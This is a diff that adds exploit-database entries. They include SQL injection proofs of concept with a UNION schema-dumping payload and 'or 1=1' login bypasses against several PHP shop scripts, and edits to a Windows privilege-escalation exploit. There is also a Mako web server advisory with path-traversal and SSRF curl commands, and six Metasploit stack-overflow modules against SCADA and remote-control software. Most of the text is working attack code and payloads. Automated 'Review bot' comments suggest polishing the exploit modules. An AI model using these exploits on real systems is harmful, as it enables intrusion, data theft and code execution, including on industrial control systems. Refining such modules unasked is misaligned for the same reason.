+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=static_page&key=[SQL]
+#
+# -EfE'+/*!00009UniOn*/+/*!00009SelEcT*/+0x31,0x32,0x3c68313e494853414e2053454e43414e3c2f68313e,(/*!00009Select*/+export_set(5,@:=0,(/*!00009select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00009table_name*/,0x3c6c693e,2),/*!00009column_name*/,0xa3a,2)),@,2))--+-
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42678.txt b/platforms/php/webapps/42678.txt
new file mode 100755
index 000000000..dd83bcef2
--- /dev/null
+++ b/platforms/php/webapps/42678.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: ICSurvey- Survey Creating Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/survey-creating-script.htm
+# Demo: http://icloudcenter.net/demos/icsurvey/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=static_page&key=[SQL]
+#
+# http://localhost/[PATH]/survey.php?page=preview&test=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42679.txt b/platforms/php/webapps/42679.txt
new file mode 100755
index 000000000..41b2176a8
--- /dev/null
+++ b/platforms/php/webapps/42679.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Jewelry Store Site Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/jewelry-site-script.htm
+# Demo: http://icloudcenter.net/demos/icjewelry/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42680.txt b/platforms/php/webapps/42680.txt
new file mode 100755
index 000000000..f4452402c
--- /dev/null
+++ b/platforms/php/webapps/42680.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Custom T-Shirt WebStore Script 1.2 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/t-shirt.htm
+# Demo: http://icloudcenter.net/demos/ictshirt/
+# Version: 1.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42681.txt b/platforms/php/webapps/42681.txt
new file mode 100755
index 000000000..83d3d0c72
--- /dev/null
+++ b/platforms/php/webapps/42681.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Customized Products Shopping Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/bpProductConfigurator.htm
+# Demo: http://icloudcenter.net/demos/icproductconfigurator/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42682.txt b/platforms/php/webapps/42682.txt
new file mode 100755
index 000000000..866aca857
--- /dev/null
+++ b/platforms/php/webapps/42682.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Grocery Store Supermarket Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/grocery-store-supermarket-script.htm
+# Demo: http://icloudcenter.net/demos/icgrocery/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42684.txt b/platforms/php/webapps/42684.txt
new file mode 100755
index 000000000..9cd728c21
--- /dev/null
+++ b/platforms/php/webapps/42684.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Car Rental Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/limousine-car-hire-script.html
+# Demo: http://icloudcenter.net/demos/iccalllimousine/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42685.txt b/platforms/php/webapps/42685.txt
new file mode 100755
index 000000000..cfb333ee7
--- /dev/null
+++ b/platforms/php/webapps/42685.txt
@@ -0,0 +1,31 @@
+# # # # #
+# Exploit Title: Project Bidding Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/project_bidding_script.htm
+# Demo: http://www.icloudcenter.net/demos/icprojectbidding/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin
+#
+# User: 'or 1=1 or ''=' Pass: anything
+#
+# http://localhost/[PATH]/admin/viewuserips.php?id=[SQL]
+
+# http://localhost/[PATH]/admin/editadminuser.php?id=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42686.txt b/platforms/php/webapps/42686.txt
new file mode 100755
index 000000000..9ff417a61
--- /dev/null
+++ b/platforms/php/webapps/42686.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Dental Clinic Site Script 1.2 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/dental-clinic-script.htm
+# Demo: http://icloudcenter.net/demos/icdentalclinic/
+# Version: 1.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42688.txt b/platforms/php/webapps/42688.txt
new file mode 100755
index 000000000..443d935b7
--- /dev/null
+++ b/platforms/php/webapps/42688.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Support Tickets Helpdesk PHP Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/support-tickets-helpdesk-script.htm
+# Demo: http://icloudcenter.net/demos/ichelpdesk/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=static_pages&pk=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42689.txt b/platforms/php/webapps/42689.txt
new file mode 100755
index 000000000..a3bfb5ded
--- /dev/null
+++ b/platforms/php/webapps/42689.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Website Builder Script With e-Commerce 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/site-builder-script.htm
+# Demo: http://icloudcenter.net/demos/icsitebuilder/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=news&nid=[SQL]
+#
+# http://localhost/[PATH]/admin
+#
+# User: 'or 1=1 or ''=' Pass: anything
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/windows/local/42665.py b/platforms/windows/local/42665.py
index fdf5e9917..3befa8def 100755
--- a/platforms/windows/local/42665.py
+++ b/platforms/windows/local/42665.py
@@ -34,7 +34,9 @@ Timeline:
Exploitation:
=============
-This exploit uses a data only attack via the Quota Process Pointer Overwrite technique. We smash the token and dec a controlled address by 0x50 (size of the Mutant) to enable SeDebugPrivilege's. Then we inject code into a system process.
+This exploit uses a data only attack via the Quota Process Pointer Overwrite technique. We smash the token's _SEP_TOKEN_PRIVILEGES->Enabled and dec the controlled address by 0x50 (size of the Mutant) to enable SeDebugPrivilege's. Then we inject code into a system process.
+
+Note that this exploit doesn't use any kernel mode shellcode :->
References:
===========
@@ -222,11 +224,10 @@ def alloc_pool_overflow_buffer(base, input_size):
print "(+) allocating pool overflow input buffer"
baseadd = c_int(base)
size = c_int(input_size)
+ priv = token + 0x40 + 0x8 # Enabled
input = struct.pack(" GET /fs/C/Windows/system.ini HTTP/1.1
+> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
+> Host: VICTIM-IP
+> Accept: */*
+>
+< HTTP/1.1 200 OK
+< Date: Mon, 07 Aug 2017 22:21:27 GMT
+< Server: MakoServer.net
+< Content-Type: application/octet-stream
+< Accept-Ranges: bytes
+< Etag: 58b4be20
+< Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT
+< Content-Length: 219
+< Keep-Alive: Keep-Alive
+; for 16-bit app support
+[386Enh]
+woafont=dosapp.fon
+EGA80WOA.FON=EGA80WOA.FON
+EGA40WOA.FON=EGA40WOA.FON
+CGA80WOA.FON=CGA80WOA.FON
+CGA40WOA.FON=CGA40WOA.FON
+
+[drivers]
+wave=mmdrv.dll
+timer=timer.drv
+
+[mci]
+
+
+Server Side Request Forgery
+
+Mako web-server tutorial is not sufficiently sanitizing incoming POST requests, when an attacker sends an POST request to the ‘rtl/appmgr/new-application.lsp‘
+URI, the input will be executed and the server will connect to the attacker’s machine.
+
+Proof of Concept
+Start Wireshark to see successful connections made from Mako Web Server victim machine.
+
+Initiate requests from another machine using CURL:
+
+curl -v -X POST http://VICTIM-IP/rtl/appmgr/new-application.lsp -d io=net -d path=http://EXTERNAL-IP
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+====================
+Would like to acknowledge Beyond Security’s SSD program for the help with co-ordination of this vulnerability.
+More details can be found on their blog at:
+
+https://blogs.securiteam.com/index.php/archives/3391
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/platforms/windows/remote/42691.rb b/platforms/windows/remote/42691.rb
new file mode 100755
index 000000000..50b628bfb
--- /dev/null
+++ b/platforms/windows/remote/42691.rb
@@ -0,0 +1,68 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::TcpServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ZScada Net Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack based buffer overflow found in
+ Z-Scada Net 2.0. The vulnerability is triggered when parsing
+ the response to a Modbus packet.
+ },
+ 'Author' => [ 'james fitts' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'url', 'https://lists.immunityinc.com/pipermail/canvas/2014-December/000141.html' ],
+ ],
+ 'Privileged' => false,
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 500,
+ 'BadChars' => "",
+ 'StackAdjustment' => -3500
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [
+ 'Windows XP SP3 EN',
+ {
+ # zscadanet.exe v1.0
+ # pop ecx/ pop ebp/ retn
+ 'Ret' => 0x00429c35
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Dec 11 2014'))
+
+ register_options(
+ [
+ OptPort.new('SRVPORT', [ true, "The port to listen on", 502])
+ ], self.class)
+ end
+
+ def on_client_data(client)
+ p = payload.encoded
+
+ buf = pattern_create(5000)
+ buf[574, 4] = [0x909006eb].pack('V') # jmp $+8
+ buf[578, 4] = [target.ret].pack('V')
+ buf[582, 24] = "\x41" * 24
+ buf[606, p.length] = p
+
+ client.put(buf)
+ handler
+ service.close_client(client)
+ end
+
+end
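Review bot: `pattern_create(5000)` in `on_client_data` is called unqualified, while the sibling module 42693.rb in this commit writes `Rex::Text.pattern_create(5000)`; the two forms should agree across the modules landing together, and the explicit form makes the dependency obvious to a reader. The handler also gives the operator no feedback when a client connects, unlike the `print_status("Trying target ...")` lines in 42694.rb and 42696.rb; a `print_status("Client #{client.peerhost} connected, sending #{buf.length} bytes...")` before `client.put(buf)` would match them. The same two points apply to `on_client_data` in 42693.rb and 42700.rb.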
diff --git a/platforms/windows/remote/42693.rb b/platforms/windows/remote/42693.rb
new file mode 100755
index 000000000..1cf2092ff
--- /dev/null
+++ b/platforms/windows/remote/42693.rb
@@ -0,0 +1,73 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::TcpServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'VIPA Authomation WinPLC7 recv Stack Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack based buffer overflow found in VIPA
+ Automation WinPLC7 <= 5.0.45.5921. The overflow is triggered when
+ WinPLC7 connects to a remote server and accepts a malicious packet.
+ The first 2 bytes of this packet are read in and used as the size
+ value for a later recv function. If a size value of sufficiently
+ large size is supplied a stack buffer overflow will occur
+ },
+ 'Author' => [ 'james fitts' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'ZDI', '17-112' ],
+ [ 'CVE', '2017-5177' ],
+ [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-054-01' ]
+ ],
+ 'Privileged' => false,
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 500,
+ 'BadChars' => "",
+ 'StackAdjustment' => -3500
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [
+ 'Windows 7 EN',
+ {
+ # ws7v5.exe
+ # jmp esp
+ 'Ret' => 0x00422354
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Feb 28 2017'))
+
+ register_options(
+ [
+ OptPort.new('SRVPORT', [ true, "The port to listen on", 7777])
+ ], self.class)
+ end
+
+ def on_client_data(client)
+ p = payload.encoded
+
+ pkt = "\x13\x88\x00\x00\x00" # len
+ pkt += Rex::Text.pattern_create(5000)
+
+ pkt[848, 4] = [target.ret].pack('V')
+ pkt[852, p.length] = p
+
+ client.put(pkt)
+ handler
+ service.close_client(client)
+ end
+
+end
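Review bot: The `'Name'` string at the top of `initialize` reads `'VIPA Authomation WinPLC7 recv Stack Buffer Overflow'`, a typo for "Automation" that the description two lines below spells correctly; change it to `'Name' => 'VIPA Automation WinPLC7 recv Stack Buffer Overflow'`. The description block also ends without a period, unlike the other descriptions in this commit.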
diff --git a/platforms/windows/remote/42694.rb b/platforms/windows/remote/42694.rb
new file mode 100755
index 000000000..6a3b6fb04
--- /dev/null
+++ b/platforms/windows/remote/42694.rb
@@ -0,0 +1,100 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Sielco Sistemi Winlog <= 2.07.16',
+ 'Description' => %q{
+ This module exploits a stack based buffer overflow
+ found in Sielco Sistemi Winlog <= 2.07.16. The
+ overflow is triggered during the parsing of a
+ maliciously crafted packet
+ },
+ 'Author' => [ 'James Fitts' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision: $',
+ 'References' =>
+ [
+ ],
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 150,
+ 'BadChars' => "\x00\x0a\x0d\x20",
+ 'DisableNops' => 'True',
+ # add esp, -5500
+ 'PrependEncoder' => "\x81\xc4\x84\xea\xff\xff",
+ 'Compat' =>
+ {
+ 'SymbolLookup' => 'ws2ord',
+ }
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [
+ 'Windows XP SP3 EN (Automatic Washing System Demo)',
+ {
+ # vcldb40.bpl
+ # jmp esp
+ 'Ret' => 0x46035f8b,
+ 'Offset' => 160,
+ 'jmp' => "\xe9\x56\xff\xff\xff",
+ }
+ ],
+ [
+ 'Windows XP SP3 EN (Car Simulation)',
+ {
+ # vcl40.bpl
+ # jmp esp
+ 'Ret' => 0x4003eb6b,
+ 'Offset' => 175,
+ 'jmp' => "\xe9\x46\xff\xff\xff",
+ }
+ ],
+ [
+ 'Windows XP SP3 EN (Ceramics Kiln)',
+ {
+ # ter19.dll
+ # push esp/ retn
+ 'Ret' => 0x258b4432,
+ 'Offset' => 176,
+ 'jmp' => "\xe9\x46\xff\xff\xff",
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jun 26 2012'))
+
+ register_options([Opt::RPORT(46824)], self.class)
+ end
+
+ def exploit
+ connect
+
+ boom = rand_text_alpha_upper(20)
+ boom << 'x'
+ boom << rand_text_alpha_upper(target['Offset'])
+ boom << [target.ret].pack('V')
+ boom << "\x41" * 4
+ boom << target['jmp']
+ boom << "\xcc" * (281 - boom.length)
+
+ boom[22,4] = "\x41" * 4
+ boom[26,payload.encoded.length] = payload.encoded
+
+ print_status("Trying target #{target.name}...")
+ sock.put(boom)
+
+ handler
+ end
+
+end
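Review bot: `'References' => [ ]` in `initialize` is empty, so the module carries no pointer to an advisory or vendor note for the Winlog <= 2.07.16 issue it describes; the source should be added here or the key dropped rather than left as an empty list. Two other metadata keys are stale: `'Version' => '$Revision: $'` is an unexpanded SVN keyword that serves no purpose in a git-hosted module, and `'DisableNops' => 'True'` is a string where a boolean `true` is the conventional value (a truthy string happens to work in Ruby, but it reads as a mistake). The same `'Version'` placeholder appears in 42696.rb, 42703.rb and 42699.rb, and `'DisableNops' => 'true'` in 42696.rb.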
diff --git a/platforms/windows/remote/42696.rb b/platforms/windows/remote/42696.rb
new file mode 100755
index 000000000..97923e28b
--- /dev/null
+++ b/platforms/windows/remote/42696.rb
@@ -0,0 +1,84 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Motorola Netopia Netoctopus SDCS Stack Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a vulnerability within the code responsible for
+ parsing client requests. When reading in a request from the network,
+ a 32-bit integer is read in that specifies the number of bytes that
+ follow. This value is not validated, and is then used to read data into
+ a fixed-size stack buffer.
+ },
+ 'Author' => [ 'James Fitts' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision: $',
+ 'References' =>
+ [
+ [ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=851' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread',
+ },
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'Space' => 500,
+ 'DisableNops' => 'true',
+ 'BadChars' => "",
+ 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [
+ 'Windows XP SP3 EN',
+ {
+ # pop ecx/ pop ecx/ retn
+ # msvcrt.dll
+ 'Ret' => 0x0044e046,
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jul 14 2008'))
+
+ register_options(
+ [
+ Opt::RPORT(3814)
+ ], self.class )
+ end
+
+ def exploit
+ connect
+
+ p = payload.encoded
+
+ pkt = "\x41" * 600
+ pkt[0, 4] = [0x01000000].pack('V')
+ pkt[8, 4] = [0x01000000].pack('V')
+ pkt[12, 4] = [0x01000000].pack('V')
+ pkt[16, 4] = [0x03000000].pack('V') # this is the value mentioned above
+ pkt[20, 4] = [0x66000000].pack('V')
+ pkt[30, p.length] = p
+ pkt[545, 4] = "\xeb\x06\x90\x90"
+ pkt[549, 4] = [target.ret].pack('V')
+ pkt[558, 6] = "\x81\xc4\x34\x06\x00\x00" # add esp, 1588
+ pkt[564, 2] = "\xff\xe4" # jmp esp
+
+
+ print_status("Trying target %s..." % target.name)
+
+ sock.put(pkt)
+
+ handler
+ disconnect
+ end
+
+end
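Review bot: `print_status("Trying target %s..." % target.name)` in `exploit` uses printf-style formatting while the otherwise parallel line in 42694.rb uses interpolation, `print_status("Trying target #{target.name}...")`; the modules in this commit should settle on one form. The body also has a doubled blank line after the `pkt[564, 2]` assignment, and the target comments `# pop ecx/ pop ecx/ retn` then `# msvcrt.dll` are in the reverse order of the `# module` then `# gadget` convention the other modules follow.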
diff --git a/platforms/windows/remote/42700.rb b/platforms/windows/remote/42700.rb
new file mode 100755
index 000000000..9b7090053
--- /dev/null
+++ b/platforms/windows/remote/42700.rb
@@ -0,0 +1,71 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::TcpServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Fatek Automation PLC WinProladder Stack-based Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack based buffer overflow found in Fatek Automation
+ PLC WinProladder v3.11 Build 14701. The vulnerability is triggered when a client
+ connects to a listening server. The client does not properly sanitize the length
+ of the received input prior to placing it on the stack.
+ },
+ 'Author' => [ 'james fitts' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'ZDI', '16-672' ],
+ [ 'CVE', '2016-8377' ],
+ [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-350-01' ]
+ ],
+ 'Privileged' => false,
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 1000,
+ 'BadChars' => "\x00\x0a\x0d\x20",
+ 'StackAdjustment' => -3500
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [
+ 'Windows 7 EN',
+ {
+ # CC3250MT.dll
+ # pop ecx/ pop ebp/ retn
+ 'Ret' => 0x32514d79
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Dec 15 2016'))
+
+ register_options(
+ [
+ OptPort.new('SRVPORT', [ true, "The port to listen on", 500])
+ ], self.class)
+ end
+
+ def on_client_data(client)
+ p = payload.encoded
+
+ pkt = "A" * 10000
+ pkt[1092, 4] = [0x04eb9090].pack('V') # jmp $+6
+ pkt[1096, 4] = [target.ret].pack('V')
+ pkt[1100, 50] = "\x90" * 50
+ pkt[1150, p.length] = p
+
+ client.put(pkt)
+ handler
+ service.close_client(client)
+ end
+
+end
diff --git a/platforms/windows/remote/42703.rb b/platforms/windows/remote/42703.rb
new file mode 100755
index 000000000..13898efb1
--- /dev/null
+++ b/platforms/windows/remote/42703.rb
@@ -0,0 +1,112 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Dameware Mini Remote Control Username Stack Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack based buffer overflow vulnerability found
+ in Dameware Mini Remote Control v4.0. The overflow is caused when sending
+ an overly long username to the DWRCS executable listening on port 6129.
+ The username is read into a strcpy() function causing an overwrite of
+ the return pointer leading to arbitrary code execution.
+ },
+ 'Author' => [ 'James Fitts' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision: $',
+ 'References' =>
+ [
+ [ 'CVE', '2005-2842' ],
+ [ 'BID', '14707' ],
+ [ 'URL', 'http://secunia.com/advisories/16655' ],
+ [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread',
+ },
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'Space' => 140,
+ 'BadChars' => "\x00\x0a\x0d",
+ 'StackAdjustment' => -3500,
+ 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
+ 'Compat' =>
+ {
+ 'SymbolLookup' => '+ws2ord',
+ },
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [
+ 'Windows XP SP3 EN',
+ {
+ # msvcrt.dll
+ # push esp/ retn
+ 'Ret' => 0x77c35459,
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Sept 01 2005'))
+
+ register_options(
+ [
+ Opt::RPORT(6129),
+ ], self.class )
+ end
+
+ def pkt1
+ p = payload.encoded
+
+ boom = "\x43" * 259
+ boom[100, 4] = [target.ret].pack('V')
+ boom[108, p.length] = p
+
+ packet = "\x00" * 4056
+ packet[0, 4] = "\x30\x11\x00\x00"
+ packet[4, 4] = "\x00\x00\x00\x00"
+ packet[8, 4] = "\xd7\xa3\x70\x3d"
+ packet[12, 4] = "\x0a\xd7\x0d\x40"
+ packet[16, 20] = "\x00" * 20
+ packet[36, 4] = "\x01\x00\x00\x00"
+
+ packet[40, 4] = [0x00002710].pack('V')
+ packet[196, 259] = rand_text_alpha(259)
+ packet[456, 259] = boom
+ packet[716, 259] = rand_text_alpha(259)
+ packet[976, 259] = rand_text_alpha(259)
+ packet[1236, 259] = rand_text_alpha(259)
+ packet[1496, 259] = rand_text_alpha(259)
+
+ return packet
+ end
+
+ def pkt2
+ packet = "\x00" * 4096
+ packet[756, 259] = rand_text_alpha(259)
+
+ return packet
+
+ end
+
+ def exploit
+ connect
+
+ sock.put(pkt1)
+ sock.recv(1024)
+ sock.put(pkt2)
+ sock.recv(84)
+
+ handler
+ disconnect
+ end
+
+end
+__END__
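Review bot: `'DisclosureDate' => 'Sept 01 2005'` in `initialize` uses a four-letter month abbreviation where every other module in this commit uses the three-letter `Mon DD YYYY` form; Ruby's date parser may accept it, but `'DisclosureDate' => 'Sep 01 2005'` removes the doubt. The trailing `__END__` at the end of the file has nothing after it and can be dropped, and `pkt2` has a stray blank line before its `end`. The two `sock.recv` results in `exploit` are discarded; if they are only there to pace the exchange, a one-line comment saying so would save the next reader from assuming a parse step is missing.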
